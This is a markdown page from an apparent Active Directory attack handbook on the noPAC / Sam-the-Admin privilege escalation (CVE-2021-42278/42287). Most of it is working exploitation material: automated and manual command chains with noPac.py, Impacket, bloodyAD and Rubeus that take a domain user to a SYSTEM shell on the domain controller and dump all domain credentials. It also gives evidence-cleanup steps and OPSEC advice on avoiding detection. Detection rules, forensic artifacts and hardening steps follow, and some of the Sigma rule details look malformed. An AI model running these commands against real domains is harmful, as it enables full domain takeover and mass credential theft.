attack-44-nopac-sam-the-admin-cve-2021-42278-42287.md (24986B)
1 --- 2 title: "Attack #44 β noPAC Sam-the-Admin (CVE-2021-42278 42287)" 3 description: "noPAC (Sam-the-Admin) chains two CVEs to escalate from any domain user to Domain Admin:" 4 category: active-directory 5 subcategory: "Domain Controller Attacks" 6 tags: ["active-directory", "adcs", "kerberos", "privilege-escalation"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/π΅ Attack #44 β noPAC Sam-the-Admin (CVE-2021-42278 42287).md" 11 --- 12 # π΅ Attack #44 β noPAC / Sam-the-Admin (CVE-2021-42278/42287) 13 14 *** 15 16 ## π How It Works 17 18 noPAC (Sam-the-Admin) chains two CVEs to escalate from any domain user to Domain Admin: 19 20 1. **[CVE-2021-42278](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278)** β Allows a machine account's `sAMAccountName` to not end with `$`, mimicking user accounts 21 2. **[CVE-2021-42287](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287)** β KDC fails to verify PAC when a TGT is requested after renaming an account 22 23 The attacker creates a machine account, renames it to match a DC's `sAMAccountName` (without `$`), requests a TGT, renames it back, then requests a service ticket β the KDC confuses the identity and issues a ticket with DC-level privileges. 24 25 > [!info]+ Technical Deep-Dive β sAMAccountName Confusion & PAC Bypass 26 > 1. **Step 1 β Machine Account Creation**: Any domain user can create machine accounts (up to `ms-DS-MachineAccountQuota`, default = 10). The attacker creates a machine account `NOPAC$` 27 > 2. **Step 2 β sAMAccountName Rename** (CVE-2021-42278): The attacker renames `NOPAC$` to `DC01` (removing the `$` suffix). Normally, machine account sAMAccountNames MUST end with `$` β this CVE bypasses that validation 28 > 3. **Step 3 β TGT Request**: The attacker requests a TGT as `DC01` using the machine account's known password. The KDC issues a TGT for `DC01` β the account currently named `DC01` 29 > 4. **Step 4 β Rename Back**: The attacker renames the account back to `NOPAC$` (restoring the `$`) 30 > 5. **Step 5 β S4U2Self** (CVE-2021-42287): The attacker uses the TGT (issued for `DC01`) to request a service ticket via **S4U2Self**, impersonating Administrator. The KDC looks up `DC01` β the renamed account is now `NOPAC$`, so it doesn't match. The KDC then searches for `DC01$` (appending `$`) and finds the **real Domain Controller** 31 > 6. **Result**: The KDC issues a service ticket as if the request came from the real `DC01$` machine account β with full DC privileges, including the ability to DCSync 32 > 7. *The core issue is that the KDC doesn't properly validate the PAC (Privilege Attribute Certificate) when the account name doesn't match β it falls back to appending `$` and finding a different account entirely* 33 34 *** 35 36 ## βοΈ Prerequisites 37 38 | Requirement | Detail | 39 |---|---| 40 | **Any domain user credentials** | To create a machine account (needs MAQ > 0) | 41 | **MachineAccountQuota > 0** | Default = 10; allows any domain user to create machine accounts | 42 | **Unpatched DCs** | Patched November 2021 ([KB5008102](https://support.microsoft.com/en-us/help/5008102) / [KB5008380](https://support.microsoft.com/en-us/help/5008380)) | 43 | **Network access to DC** | Standard Kerberos (TCP 88) and LDAP (TCP 389/636) ports | 44 45 *** 46 47 ## π οΈ Tools 48 49 | Tool | Platform | Version | Notes | 50 |---|---|---|---| 51 | [noPac.py](https://github.com/Ridter/noPac) | Linux/Python | Python 3 | Automated exploit β scan + exploit in one command | 52 | [sam-the-admin](https://github.com/WazeHell/sam-the-admin) | Linux/Python | Python 3 | Alternative automated exploit script | 53 | [Impacket](https://github.com/fortra/impacket) | Linux | β₯ 0.10.0 | `addcomputer.py`, `renameMachine.py`, `getTGT.py`, `getST.py` β manual exploitation | 54 | [bloodyAD](https://github.com/CravateRouge/bloodyAD) | Linux/Python | β₯ 1.0.0 | Machine account creation and sAMAccountName modification | 55 | [NetExec](https://github.com/Pennyw0rth/NetExec) | Linux | β₯ 1.1.0 | `-M nopac` module β scan for vulnerability | 56 | [Rubeus](https://github.com/GhostPack/Rubeus) | Windows (.NET) | β₯ 2.0 | `asktgt` + `s4u` for Windows-based manual exploitation | 57 | [PowerMAD](https://github.com/Kevin-Robertson/Powermad) | Windows/PowerShell | Latest | `New-MachineAccount` β PowerShell machine account creation | 58 59 *** 60 61 ## β±οΈ Time-to-Execute Estimates 62 63 | Operation | Time | Notes | 64 |---|---|---| 65 | Vulnerability scan | **3β5 seconds** | noPac.py `-scan` mode | 66 | Automated exploitation | **10β30 seconds** | Full chain: create β rename β TGT β rename β S4U β shell | 67 | Manual exploitation (6 steps) | **60β120 seconds** | Each Impacket command takes a few seconds | 68 | Full chain β DCSync | **30β60 seconds** | From any domain user to full credential dump | 69 70 *** 71 72 ## π» Full Commands 73 74 ### π΅ Check Vulnerability 75 76 ```bash 77 # ββ noPac.py scan mode ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 78 python3 noPac.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \ 79 -dc-host DC01 --scan 80 # Output: "Current ms-DS-MachineAccountQuota = 10" 81 # Output: "DC01 is VULNERABLE" or "DC01 is NOT VULNERABLE" 82 83 # ββ NetExec noPAC module ββββββββββββββββββββββββββββββββββββββββββββββββββββββ 84 nxc smb DC01.corp.local -u low_user -p 'Password1' -M nopac 85 # Output: [+] VULNERABLE or [-] not vulnerable 86 87 # ββ Check MAQ manually ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 88 nxc ldap DC01.corp.local -u low_user -p 'Password1' -M maq 89 # Or: 90 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 91 get object 'DC=corp,DC=local' --attr ms-DS-MachineAccountQuota 92 ``` 93 94 ### π΄ Automated Exploitation (Recommended) 95 96 ```bash 97 # ββ noPac.py β fully automated β SYSTEM shell on DC ββββββββββββββββββββββββββ 98 python3 noPac.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \ 99 -dc-host DC01 -shell --impersonate Administrator -use-ldap 100 101 # Output: Interactive SYSTEM shell on DC01 102 # From here: secretsdump.py, mimikatz, or any post-exploitation 103 104 # ββ noPac.py β get service ticket only (no shell) ββββββββββββββββββββββββββββ 105 python3 noPac.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \ 106 -dc-host DC01 --impersonate Administrator -use-ldap -dump 107 # Dumps NTDS via DCSync using the impersonated Administrator ticket 108 109 # ββ sam-the-admin (alternative) βββββββββββββββββββββββββββββββββββββββββββββββ 110 python3 sam_the_admin.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \ 111 -dc-host DC01 -shell 112 ``` 113 114 ### π΄ Manual Exploitation (Step-by-Step) 115 116 ```bash 117 # ββ Step 1: Create machine account ββββββββββββββββββββββββββββββββββββββββββββ 118 addcomputer.py -computer-name 'NOPAC$' -computer-pass 'FakePass!' \ 119 -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 120 # Creates NOPAC$ with password FakePass! 121 122 # ββ Step 2: Rename sAMAccountName to DC01 (remove the $) βββββββββββββββββββββ 123 python3 renameMachine.py -current-name 'NOPAC$' -new-name 'DC01' \ 124 corp.local/low_user:'Password1' -dc-ip 10.10.10.10 125 # Now the machine account's sAMAccountName = "DC01" (without $) 126 127 # ββ Step 3: Request TGT as "DC01" ββββββββββββββββββββββββββββββββββββββββββββ 128 getTGT.py corp.local/'DC01':'FakePass!' -dc-ip 10.10.10.10 129 # Outputs: DC01.ccache β TGT for the account named "DC01" 130 131 # ββ Step 4: Rename back to NOPAC$ ββββββββββββββββββββββββββββββββββββββββββββ 132 python3 renameMachine.py -current-name 'DC01' -new-name 'NOPAC$' \ 133 corp.local/low_user:'Password1' -dc-ip 10.10.10.10 134 # sAMAccountName restored to NOPAC$ β KDC will now look for "DC01$" (the real DC) 135 136 # ββ Step 5: Request service ticket (S4U2Self) using TGT ββββββββββββββββββββββ 137 export KRB5CCNAME=DC01.ccache 138 getST.py -spn cifs/DC01.corp.local -impersonate Administrator \ 139 -k -no-pass corp.local/'DC01' -dc-ip 10.10.10.10 140 # KDC confusion: looks up "DC01", finds nothing, appends "$", finds real DC01$ 141 # Issues service ticket as Administrator for cifs/DC01.corp.local 142 143 # ββ Step 6: Use the impersonated Administrator ticket βββββββββββββββββββββββββ 144 export KRB5CCNAME=Administrator@cifs_DC01.corp.local@CORP.LOCAL.ccache 145 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local 146 # Full DCSync as Administrator β extracts all domain credentials 147 148 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 149 # Interactive SYSTEM shell on DC01 150 ``` 151 152 #### bloodyAD Alternative (Machine Account Creation) 153 154 ```bash 155 # ββ Create machine account with bloodyAD ββββββββββββββββββββββββββββββββββββββ 156 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 157 add computer 'NOPAC$' 'FakePass!' 158 159 # ββ Modify sAMAccountName ββββββββββββββββββββββββββββββββββββββββββββββββββββ 160 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 161 set object 'NOPAC$' sAMAccountName -v 'DC01' 162 ``` 163 164 #### Windows-Based (Rubeus + PowerMAD) 165 166 ```powershell 167 # ββ Create machine account with PowerMAD ββββββββββββββββββββββββββββββββββββββ 168 Import-Module .\Powermad.ps1 169 New-MachineAccount -MachineAccount NOPAC -Password $(ConvertTo-SecureString 'FakePass!' -AsPlainText -Force) 170 171 # ββ Rename (requires AD module or direct LDAP modification) ββββββββββββββββββ 172 Set-ADComputer NOPAC -SamAccountName 'DC01' 173 174 # ββ Request TGT with Rubeus ββββββββββββββββββββββββββββββββββββββββββββββββββ 175 .\Rubeus.exe asktgt /user:DC01 /password:FakePass! /domain:corp.local /dc:DC01.corp.local /nowrap 176 177 # ββ Rename back βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 178 Set-ADComputer NOPAC -SamAccountName 'NOPAC$' 179 180 # ββ S4U with Rubeus ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 181 .\Rubeus.exe s4u /ticket:<base64_TGT> /impersonateuser:Administrator /msdsspn:cifs/DC01.corp.local /ptt 182 # Ticket injected into current session β access DC01 as Administrator 183 ``` 184 185 ### π΄ Post-Exploitation Cleanup 186 187 ```bash 188 # ββ Delete the machine account after exploitation βββββββββββββββββββββββββββββ 189 addcomputer.py -computer-name 'NOPAC$' -dc-ip 10.10.10.10 \ 190 corp.local/Administrator:'Password1' -delete 191 192 # ββ Or via bloodyAD ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 193 bloodyAD -d corp.local -u Administrator -p 'Password1' --host DC01.corp.local \ 194 remove computer 'NOPAC$' 195 ``` 196 197 *** 198 199 ## π― OPSEC Tips 200 201 1. **noPac.py automated mode is fast but creates a machine account** β this is logged (Event 4741) and persists in AD unless cleaned up 202 2. **Always delete the machine account after exploitation** β leftover accounts with non-standard names are forensic artifacts 203 3. **The sAMAccountName rename is the most detectable step** β Event 4742 logs the attribute change; this is unusual for machine accounts 204 4. **Use `-use-ldap` flag** with noPac.py β some environments have issues with the default SAMR protocol for machine account operations 205 5. **Manual exploitation is stealthier than automated** β you control the timing between each step and can add delays 206 6. **Check MAQ before starting** β if MachineAccountQuota = 0, you can't create machine accounts; look for existing machine accounts you can modify instead 207 7. **Clean up ccache files** after exploitation β `DC01.ccache` and the impersonated ticket are evidence 208 209 ### π OpSec Ranking 210 211 | Method | Stealth | Speed | Reliability | Notes | 212 |---|---|---|---|---| 213 | noPac.py automated | π‘ Medium | π’ Fast | π’ High | Fast but creates machine account + renames | 214 | Manual Impacket steps | π‘ Medium | π‘ Medium | π’ High | More control; can add delays between steps | 215 | Rubeus + PowerMAD (Windows) | π‘ Medium | π‘ Medium | π‘ Medium | PowerShell logging catches module loads | 216 | bloodyAD + Impacket | π‘ Medium | π‘ Medium | π’ High | Good alternative; fewer dependencies | 217 218 *** 219 220 ## π‘οΈ Detection β Event IDs 221 222 | Event ID | Source | What to Look For | 223 |---|---|---| 224 | **4741** | Security Log (DC) | Machine account creation β `NOPAC$` or unusual naming pattern | 225 | **4742** | Security Log (DC) | Machine account renamed β `sAMAccountName` changed (critical indicator) | 226 | **4768** | Security Log (DC) | TGT request for account matching DC name (e.g., `DC01` without `$`) | 227 | **4769** | Security Log (DC) | Service ticket request (S4U2Self) using the confused identity | 228 | **4743** | Security Log (DC) | Machine account deleted (cleanup by attacker) | 229 230 ### π Sigma Rules 231 232 ```yaml 233 # ββ SigmaHQ β Machine Account sAMAccountName Change (noPAC Indicator) ββββββββ 234 title: Machine Account sAMAccountName Modification (noPAC/CVE-2021-42278) 235 id: c7d8e9f0-nopac-samaccountname-change 236 status: stable 237 logsource: 238 product: windows 239 service: security 240 detection: 241 selection: 242 EventID: 4742 243 keywords: 244 AttributeValue|contains: 'sAMAccountName' 245 condition: selection 246 level: critical 247 tags: 248 - attack.privilege_escalation 249 - attack.t1068 250 - cve.2021.42278 251 - cve.2021.42287 252 ``` 253 254 ```yaml 255 # ββ SigmaHQ β TGT Request for DC Name Without $ Suffix βββββββββββββββββββββββ 256 title: TGT Request for Account Matching DC Name (noPAC Indicator) 257 id: a1b2c3d4-nopac-tgt-dc-name 258 logsource: 259 product: windows 260 service: security 261 detection: 262 selection: 263 EventID: 4768 264 TargetUserName|endswith: '' # Does NOT end with $ 265 filter_dc: 266 TargetUserName|endswith: '$' 267 filter_users: 268 TargetUserName|re: '^(?!DC|dc)' # Only alert on names matching DC naming patterns 269 condition: selection and not filter_dc 270 level: high 271 ``` 272 273 ### π‘οΈ EDR-Specific Detections 274 275 > [!warning]+ Microsoft Defender for Identity (MDI) 276 > 1. **"Suspected noPac exploitation (CVE-2021-42278/42287)"** β specific detection for the sAMAccountName rename + TGT request pattern 277 > 2. MDI correlates machine account creation β rename β TGT request β rename-back as a single attack sequence 278 > 3. **"Suspicious machine account name change"** β fires on any machine account sAMAccountName modification that removes the `$` suffix 279 > 4. *MDI added noPAC detection within weeks of the CVE disclosure β high-confidence alerting* 280 281 > [!warning]+ CrowdStrike Falcon 282 > 1. **"noPAC/Sam-the-Admin Exploitation"** β behavioral detection for the machine account creation β rename β Kerberos abuse chain 283 > 2. Falcon detects automated exploitation tools (noPac.py, sam-the-admin) via process and network behavioral analysis 284 > 3. Also detects the Kerberos ticket manipulation (S4U2Self with confused identity) 285 286 > [!warning]+ Elastic Security 287 > 1. Rule: **"Machine Account sAMAccountName Changed"** β Event 4742 correlation for sAMAccountName attribute modifications 288 > 2. Rule: **"TGT Requested for Account Matching Domain Controller Name"** β Event 4768 correlation 289 > 3. Rule: **"Rapid Machine Account Create-Rename-Delete Pattern"** β temporal correlation of Events 4741β4742β4743 290 291 *** 292 293 ## π¬ Forensic Artifacts 294 295 | Artifact | Location | Details | 296 |---|---|---| 297 | **Machine account creation** | Event 4741 | New computer account `NOPAC$` with creation timestamp | 298 | **sAMAccountName change** | Event 4742 | Machine account renamed β old value (`NOPAC$`) β new value (`DC01`) | 299 | **TGT request** | Event 4768 | TGT for `DC01` (without `$`) β matches a DC naming pattern | 300 | **S4U2Self ticket** | Event 4769 | Service ticket request impersonating Administrator | 301 | **Machine account deletion** | Event 4743 | Account deleted (cleanup β if attacker was thorough) | 302 | **ccache files** | Attacker filesystem | `DC01.ccache` and `Administrator@cifs_*.ccache` β evidence of exploitation | 303 | **AD attribute metadata** | `msDS-ReplAttributeMetaData` on the machine account | sAMAccountName modification timestamps and originating DC | 304 | **Kerberos ticket cache** | DC LSASS memory | TGT and service tickets issued during the attack β volatile | 305 306 *** 307 308 > [!important]+ Windows Server Version & Patch Timeline 309 > 1. **November 2021 (KB5008102/KB5008380)**: Initial patch released β fixes both CVE-2021-42278 and CVE-2021-42287 310 > 2. **April 2022**: Enforcement phase β KDC rejects tickets without proper PAC validation 311 > 3. **July 2022**: Full enforcement β PAC validation required; non-patched clients may experience authentication failures 312 > 4. **Server 2012 R2**: Vulnerable if unpatched; enforcement timeline applies 313 > 5. **Server 2016**: Vulnerable if unpatched; same timeline 314 > 6. **Server 2019**: Vulnerable if unpatched; same timeline 315 > 7. **Server 2022**: Vulnerable if unpatched (even though it was released before the CVE); patches available 316 > 8. **Server 2025**: Shipped with fixes included β NOT vulnerable; PAC validation enforced by default 317 > 9. *The enforcement phase is critical β even after patching, there's a grace period before the KDC rejects vulnerable tickets; check `PacRequestorEnforcement` registry key* 318 319 *** 320 321 ## π Hardening & Prevention 322 323 ```powershell 324 # ββ 1. Set MachineAccountQuota to 0 (prevent machine account creation) ββββββββ 325 Set-ADDomain -Identity corp.local -Replace @{"ms-DS-MachineAccountQuota"="0"} 326 # Blocks any domain user from creating machine accounts 327 # β οΈ May break self-service domain join β use targeted delegation instead 328 329 # ββ 2. Apply November 2021 patches βββββββββββββββββββββββββββββββββββββββββββ 330 # Verify patches: 331 Get-HotFix | Where-Object { $_.HotFixID -match 'KB5008102|KB5008380|KB5008212' } 332 # If empty β DC is vulnerable 333 334 # ββ 3. Enable PAC validation enforcement ββββββββββββββββββββββββββββββββββββββ 335 # Registry key (post-patch): 336 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc" ` 337 -Name "PacRequestorEnforcement" -Value 2 -Type DWord 338 # Value 0 = Disabled (not recommended) 339 # Value 1 = Add PAC validation but don't enforce (default after Nov 2021 patch) 340 # Value 2 = Full enforcement (recommended β rejects tickets without PAC) 341 342 # ββ 4. Monitor machine account creation and modification ββββββββββββββββββββββ 343 # GPO β Computer Configuration β Windows Settings β Security Settings β 344 # Advanced Audit Policy β Account Management β 345 # β Audit Computer Account Management: Success, Failure 346 347 # ββ 5. Alert on sAMAccountName changes for machine accounts ββββββββββββββββββ 348 # SIEM query (Splunk example): 349 # source=WinEventLog:Security EventCode=4742 TargetUserName=*$ 350 # | search "sAMAccountName" | table _time, TargetUserName, SubjectUserName 351 352 # ββ 6. Restrict who can create machine accounts ββββββββββββββββββββββββββββββ 353 # If MAQ must be > 0, delegate machine account creation to specific OUs: 354 # Use fine-grained permissions instead of domain-wide MAQ 355 356 # ββ 7. Monitor for DC-name TGT requests from non-DC accounts βββββββββββββββββ 357 # Alert on Event 4768 where TargetUserName matches a DC name but lacks $ 358 # This is the definitive noPAC exploitation indicator 359 360 # ββ 8. Deploy MDI for automated detection βββββββββββββββββββββββββββββββββββββ 361 # MDI has specific noPAC detection since December 2021 362 ``` 363 364 *** 365 366 ## π§© Troubleshooting 367 368 | Error | Cause | Fix | 369 |---|---|---| 370 | `Machine account creation failed β quota exceeded` | MachineAccountQuota = 0 or user already created max accounts | Check MAQ value; if 0, cannot exploit via this path β look for existing machine accounts to modify | 371 | `renameMachine.py: Access denied` | Insufficient permissions to modify the machine account | Verify the user who created the account owns it; use the same user for rename; or try `bloodyAD` | 372 | `getTGT: KDC_ERR_C_PRINCIPAL_UNKNOWN` | sAMAccountName rename didn't take effect yet | Wait a few seconds for AD replication; verify rename with `Get-ADComputer NOPAC -Properties sAMAccountName` | 373 | `getST: KRB_AP_ERR_SKEW` | Clock skew > 5 minutes | Sync time: `ntpdate DC01.corp.local` | 374 | `getST: KDC_ERR_BADOPTION` | S4U2Self failed β DC may be patched | Verify DC patch status; if `PacRequestorEnforcement = 2`, the exploit is blocked | 375 | noPac.py `-shell` hangs | Network connectivity issue or SMB blocked | Try `-dump` instead of `-shell`; or use the manual approach with `getST.py` + `secretsdump.py` | 376 | `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT` | Using machine account TGT incorrectly | Ensure you're using the TGT from Step 3 (before rename-back) for the S4U request | 377 | Manual exploit: wrong ticket in Step 6 | Using TGT instead of S4U service ticket | After Step 5, `export KRB5CCNAME=Administrator@cifs_DC01...` (the S4U output), NOT the original TGT | 378 379 *** 380 381 ## πΊοΈ MITRE ATT&CK 382 383 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups | 384 |---|---|---|---|---| 385 | **Privilege Escalation** | [T1068](https://attack.mitre.org/techniques/T1068/) | Exploitation for Privilege Escalation | Exploit CVE-2021-42278/42287 to escalate from any domain user to DA via sAMAccountName confusion | Ransomware operators (Conti, LockBit) | 386 | **Credential Access** | [T1558](https://attack.mitre.org/techniques/T1558/) | Steal or Forge Kerberos Tickets | Abuse S4U2Self with confused identity to obtain Administrator service ticket | Chained technique | 387 | **Persistence** | [T1136](https://attack.mitre.org/techniques/T1136/) | [.002 β Domain Account](https://attack.mitre.org/techniques/T1136/002/) | Create machine account as part of the exploitation chain | Supporting technique | 388 389 > [!tip]+ Real-World Context 390 > `fas:Lightbulb` 391 > 1. **noPAC was weaponized within days of disclosure** (December 2021) β automated exploit tools appeared on GitHub almost immediately 392 > 2. **Conti ransomware group** incorporated noPAC into their automated domain compromise playbook as a fast-path escalation from any domain user to DA 393 > 3. **LockBit affiliates** used noPAC in early 2022 campaigns against healthcare and manufacturing targets 394 > 4. *noPAC is considered one of the most impactful AD privilege escalation vulnerabilities because it requires only any domain user account β no special permissions, no ACL abuse, just standard domain authentication* 395 396 *** 397 398 ## π Attack Chain Context 399 400 ``` 401 [noPAC] βββ Low-priv User β DA via Machine Account Naming Confusion 402 β 403 ββββ π₯ CVE-2021-42278 + CVE-2021-42287 404 ββββ π» Any domain user β SYSTEM shell on DC β DCSync (Attack #37) 405 ββββ π« DCSync KRBTGT β Golden Ticket (Attack #11) 406 ββββ π» DCSync Administrator β Pass-the-Hash (Attack #4) 407 ββββ π Alternative to: Kerberoasting (Attack #2) β cracking β DA 408 ββββ π Compare: Zerologon (Attack #40) β unauth; noPAC needs any domain user 409 ββββ π Patched Nov 2021, but legacy DCs may remain vulnerable 410 ββββ π Defeated by: patch, set MAQ=0, enforce PacRequestorEnforcement=2, monitor account renames 411 ``` 412 413 *** 414 415 > β **Attack #44 β noPAC complete.** 416 417 *** 418 419 > π **Category 5 β DC & Replication Attacks is now COMPLETE (8/8 attacks).**